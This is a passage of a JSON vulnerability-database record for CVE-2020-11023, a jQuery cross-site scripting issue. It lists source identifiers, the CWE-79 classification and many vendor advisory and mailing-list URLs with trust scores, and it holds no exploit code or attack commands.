"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171214",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "160274",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "159275",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "161727",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "161830",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "160548",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "164887",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "158750",
"trust": 0.1
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2420",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-163560",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171211",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163560"
},
{
"db": "PACKETSTORM",
"id": "159852"
},
{
"db": "PACKETSTORM",
"id": "171212"
},
{
"db": "PACKETSTORM",
"id": "171211"
},
{
"db": "PACKETSTORM",
"id": "170821"
},
{
"db": "PACKETSTORM",
"id": "170819"
},
{
"db": "PACKETSTORM",
"id": "170817"
},
{
"db": "PACKETSTORM",
"id": "168304"
},
{
"db": "PACKETSTORM",
"id": "158555"
},
{
"db": "PACKETSTORM",
"id": "159513"
},
{
"db": "PACKETSTORM",
"id": "158797"
},
{
"db": "NVD",
"id": "CVE-2020-11023"
}
]
},
"id": "VAR-202004-2199",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-163560"
}
],
"trust": 0.01
},
"last_update_date": "2026-04-10T23:34:01.350000Z",
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-79",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163560"
},
{
"db": "NVD",
"id": "CVE-2020-11023"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.2,
"url": "https://security.gentoo.org/glsa/202007-03"
},
{
"trust": 1.1,
"url": "https://github.com/jquery/jquery/security/advisories/ghsa-jpcq-cgw6-v4j6"
},
{
"trust": 1.1,
"url": "https://security.netapp.com/advisory/ntap-20200511-0006/"
},
{
"trust": 1.1,
"url": "https://www.drupal.org/sa-core-2020-002"
},
{
"trust": 1.1,
"url": "https://www.tenable.com/security/tns-2021-02"
},
{
"trust": 1.1,
"url": "https://www.tenable.com/security/tns-2021-10"
},
{
"trust": 1.1,
"url": "https://www.debian.org/security/2020/dsa-4693"
},
{
"trust": 1.1,
"url": "http://packetstormsecurity.com/files/162160/jquery-1.0.3-cross-site-scripting.html"
},
{
"trust": 1.1,
"url": "https://blog.jquery.com/2020/04/10/jquery-3-5-0-released"
},
{
"trust": 1.1,
"url": "https://jquery.com/upgrade-guide/3.5/"
},
{
"trust": 1.1,
"url": "https://www.oracle.com//security-alerts/cpujul2021.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpuapr2021.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpujan2021.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpujul2020.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpuoct2020.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"trust": 1.1,
"url": "https://lists.debian.org/debian-lts-announce/2021/03/msg00033.html"
},
{
"trust": 1.1,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00067.html"
},
{
"trust": 1.1,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00085.html"
},
{
"trust": 1.1,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00039.html"
},
{
"trust": 1.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11023"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r54565a8f025c7c4f305355fdfd75b68eca442eebdb5f31c2e7d977ae%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r0483ba0072783c2e1bfea613984bfb3c86e73ba8879d780dc1cc7d36%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/ra3c9219fcb0b289e18e9ec5a5ebeaa5c17d6b79a201667675af6721c%40%3cgitbox.hive.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r2c85121a47442036c7f8353a3724aa04f8ecdfda1819d311ba4f5330%40%3cdev.felix.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/sfp4uk4egp4afh2mwyj5a5z4i7xvfq6b/"
},
{
"trust": 1.0,
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=cve-2020-11023"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r0593393ca1e97b1e7e098fe69d414d6bd0a467148e9138d07e86ebbb%40%3cissues.hive.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/rda99599896c3667f2cc9e9d34c7b6ef5d2bbed1f4801e1d75a2b0679%40%3ccommits.nifi.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r564585d97bc069137e64f521e68ba490c7c9c5b342df5d73c49a0760%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/ra374bb0299b4aa3e04edde01ebc03ed6f90cf614dad40dd428ce8f72%40%3cgitbox.hive.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r07ab379471fb15644bf7a92e4a98cbc7df3cf4e736abae0cc7625fe6%40%3cdev.felix.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/ra406b3adfcffcb5ce8707013bdb7c35e3ffc2776a8a99022f15274c6%40%3cissues.hive.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/ra32c7103ded9041c7c1cb8c12c8d125a6b2f3f3270e2937ef8417fac%40%3cgitbox.hive.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/radcb2aa874a79647789f3563fcbbceaf1045a029ee8806b59812a8ea%40%3cissues.hive.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/rf1ba79e564fe7efc56aef7c986106f1cf67a3427d08e997e088e7a93%40%3cgitbox.hive.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/rab82dd040f302018c85bd07d33f5604113573514895ada523c3401d9%40%3ccommits.hive.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r3702ede0ff83a29ba3eb418f6f11c473d6e3736baba981a8dbd9c9ef%40%3cdev.felix.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/rbb448222ba62c430e21e13f940be4cb5cfc373cd3bce56b48c0ffa67%40%3cdev.flink.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/rd38b4185a797b324c8dd940d9213cf99fcdc2dbf1fc5a63ba7dee8c9%40%3cissues.hive.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/rb69b7d8217c1a6a2100247a5d06ce610836b31e3f5d73fc113ded8e7%40%3cissues.hive.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/re4ae96fa5c1a2fe71ccbb7b7ac1538bd0cb677be270a2bf6e2f8d108%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/qpn2l2xvqgua2v5hnqjwhk3apsk3vn7k/"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r8f70b0f65d6bedf316ecd899371fd89e65333bc988f6326d2956735c%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r4aadb98086ca72ed75391f54167522d91489a0d0ae25b12baa8fc7c5%40%3cissues.hive.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r706cfbc098420f7113968cc377247ec3d1439bce42e679c11c609e2d%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r1fed19c860a0d470f2a3eded12795772c8651ff583ef951ddac4918c%40%3cgitbox.hive.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r6c4df3b33e625a44471009a172dabe6865faec8d8f21cac2303463b1%40%3cissues.hive.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r9006ad2abf81d02a0ef2126bab5177987e59095b7194a487c4ea247c%40%3ccommits.felix.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/avkyxlwclzbv2n7m46kyk4lva5oxwpby/"
},
{
"trust": 1.0,
"url": "https://github.com/github/advisory-database/blob/99afa6fdeaf5d1d23e1021ff915a5e5dbc82c1f1/advisories/github-reviewed/2020/04/ghsa-jpcq-cgw6-v4j6/ghsa-jpcq-cgw6-v4j6.json#l20-l37"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r6e97b37963926f6059ecc1e417721608723a807a76af41d4e9dbed49%40%3cissues.hive.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/sapqvx3xdnpgft26qaq6ajixzzbz4cd4/"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/rede9cfaa756e050a3d83045008f84a62802fc68c17f2b4eabeaae5e4%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r9c5fda81e4bca8daee305b4c03283dddb383ab8428a151d4cb0b3b15%40%3cissues.hive.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r55f5e066cc7301e3630ce90bbbf8d28c82212ae1f2d4871012141494%40%3cdev.felix.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r4dba67be3239b34861f1b9cfdf9dfb3a90272585dcce374112ed6e16%40%3cdev.felix.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r9e0bd31b7da9e7403478d22652b8760c946861f8ebd7bd750844898e%40%3cdev.felix.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/rb25c3bc7418ae75cba07988dafe1b6912f76a9dd7d94757878320d61%40%3cgitbox.hive.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/ree3bd8ddb23df5fa4e372d11c226830ea3650056b1059f3965b3fce2%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/rf0f8939596081d84be1ae6a91d6248b96a02d8388898c372ac807817%40%3cdev.felix.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r49ce4243b4738dd763caeb27fa8ad6afb426ae3e8c011ff00b8b1f48%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r094f435595582f6b5b24b66fedf80543aa8b1d57a3688fbcc21f06ec%40%3cissues.hive.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/rf661a90a15da8da5922ba6127b3f5f8194d4ebec8855d60a0dd13248%40%3cdev.hive.apache.org%3e"
},
{
"trust": 0.9,
"url": "https://access.redhat.com/security/cve/cve-2020-11023"
},
{
"trust": 0.9,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11022"
},
{
"trust": 0.9,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2020-11022"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2018-14042"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2018-14040"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-14042"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2019-11358"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11358"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-14040"
},
{
"trust": 0.6,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2022-40150"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2022-40149"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2022-45047"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2022-46364"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2022-42004"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2022-45693"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2022-42003"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2015-9251"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-8331"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-10735"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-9251"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2016-10735"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8331"
},
{
"trust": 0.4,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.3,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-31129"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-31129"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-3143"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-14041"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-40150"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-18214"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-40152"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-40149"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-40152"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2018-14041"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2017-18214"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-3143"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-38750"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1471"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1438"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-3916"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-25857"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-46175"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-35065"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-44906"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-44906"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2023-0091"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-24785"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-3782"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-2764"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2764"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-4137"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-46363"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1471"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2023-0264"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-38751"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1274"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-37603"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-38749"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-35065"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1438"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-25857"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-24785"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1274"
},
{
"trust": 0.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/avkyxlwclzbv2n7m46kyk4lva5oxwpby/"
},
{
"trust": 0.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/qpn2l2xvqgua2v5hnqjwhk3apsk3vn7k/"
},
{
"trust": 0.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/sfp4uk4egp4afh2mwyj5a5z4i7xvfq6b/"
},
{
"trust": 0.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/sapqvx3xdnpgft26qaq6ajixzzbz4cd4/"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r9006ad2abf81d02a0ef2126bab5177987e59095b7194a487c4ea247c@%3ccommits.felix.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r07ab379471fb15644bf7a92e4a98cbc7df3cf4e736abae0cc7625fe6@%3cdev.felix.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r3702ede0ff83a29ba3eb418f6f11c473d6e3736baba981a8dbd9c9ef@%3cdev.felix.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rf0f8939596081d84be1ae6a91d6248b96a02d8388898c372ac807817@%3cdev.felix.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r9e0bd31b7da9e7403478d22652b8760c946861f8ebd7bd750844898e@%3cdev.felix.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r2c85121a47442036c7f8353a3724aa04f8ecdfda1819d311ba4f5330@%3cdev.felix.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r4dba67be3239b34861f1b9cfdf9dfb3a90272585dcce374112ed6e16@%3cdev.felix.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r55f5e066cc7301e3630ce90bbbf8d28c82212ae1f2d4871012141494@%3cdev.felix.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rbb448222ba62c430e21e13f940be4cb5cfc373cd3bce56b48c0ffa67@%3cdev.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r706cfbc098420f7113968cc377247ec3d1439bce42e679c11c609e2d@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r49ce4243b4738dd763caeb27fa8ad6afb426ae3e8c011ff00b8b1f48@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r564585d97bc069137e64f521e68ba490c7c9c5b342df5d73c49a0760@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r8f70b0f65d6bedf316ecd899371fd89e65333bc988f6326d2956735c@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rede9cfaa756e050a3d83045008f84a62802fc68c17f2b4eabeaae5e4@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/ree3bd8ddb23df5fa4e372d11c226830ea3650056b1059f3965b3fce2@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r54565a8f025c7c4f305355fdfd75b68eca442eebdb5f31c2e7d977ae@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/re4ae96fa5c1a2fe71ccbb7b7ac1538bd0cb677be270a2bf6e2f8d108@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r0483ba0072783c2e1bfea613984bfb3c86e73ba8879d780dc1cc7d36@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rab82dd040f302018c85bd07d33f5604113573514895ada523c3401d9@%3ccommits.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rf661a90a15da8da5922ba6127b3f5f8194d4ebec8855d60a0dd13248@%3cdev.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/ra3c9219fcb0b289e18e9ec5a5ebeaa5c17d6b79a201667675af6721c@%3cgitbox.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/ra374bb0299b4aa3e04edde01ebc03ed6f90cf614dad40dd428ce8f72@%3cgitbox.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rb25c3bc7418ae75cba07988dafe1b6912f76a9dd7d94757878320d61@%3cgitbox.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rf1ba79e564fe7efc56aef7c986106f1cf67a3427d08e997e088e7a93@%3cgitbox.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/ra32c7103ded9041c7c1cb8c12c8d125a6b2f3f3270e2937ef8417fac@%3cgitbox.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r1fed19c860a0d470f2a3eded12795772c8651ff583ef951ddac4918c@%3cgitbox.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r094f435595582f6b5b24b66fedf80543aa8b1d57a3688fbcc21f06ec@%3cissues.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r9c5fda81e4bca8daee305b4c03283dddb383ab8428a151d4cb0b3b15@%3cissues.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r6e97b37963926f6059ecc1e417721608723a807a76af41d4e9dbed49@%3cissues.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rb69b7d8217c1a6a2100247a5d06ce610836b31e3f5d73fc113ded8e7@%3cissues.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rd38b4185a797b324c8dd940d9213cf99fcdc2dbf1fc5a63ba7dee8c9@%3cissues.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/radcb2aa874a79647789f3563fcbbceaf1045a029ee8806b59812a8ea@%3cissues.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r4aadb98086ca72ed75391f54167522d91489a0d0ae25b12baa8fc7c5@%3cissues.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/ra406b3adfcffcb5ce8707013bdb7c35e3ffc2776a8a99022f15274c6@%3cissues.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r0593393ca1e97b1e7e098fe69d414d6bd0a467148e9138d07e86ebbb@%3cissues.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r6c4df3b33e625a44471009a172dabe6865faec8d8f21cac2303463b1@%3cissues.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rda99599896c3667f2cc9e9d34c7b6ef5d2bbed1f4801e1d75a2b0679@%3ccommits.nifi.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.3_release_notes/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1721"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10146"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10221"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1721"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-15720"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-15720"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10146"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10179"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10179"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10221"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:4847"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:1043"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:1044"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0552"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0554"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0556"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=securitypatches\u0026product=appplatform\u0026version=7.4"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22096"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:6393"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-22096"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23358"
},
{
"trust": 0.1,
"url": "https://github.com/pingidentity/ldapsdk/releases"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/articles/2974891"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2806"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23358"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2806"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14295\u003e"
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11022\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11023\u003e"
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/glsa/202007-03\u003e"
},
{
"trust": 0.1,
"url": "https://creativecommons.org/licenses/by-sa/2.5\u003e"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14295"
},
{
"trust": 0.1,
"url": "https://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org/\u003e."
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_amq/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=jboss.amq.interconnect\u0026downloadtype=distributions\u0026version=1.9.0"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-7656"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:4211"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-7656"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14040"
},
{
"trust": 0.1,
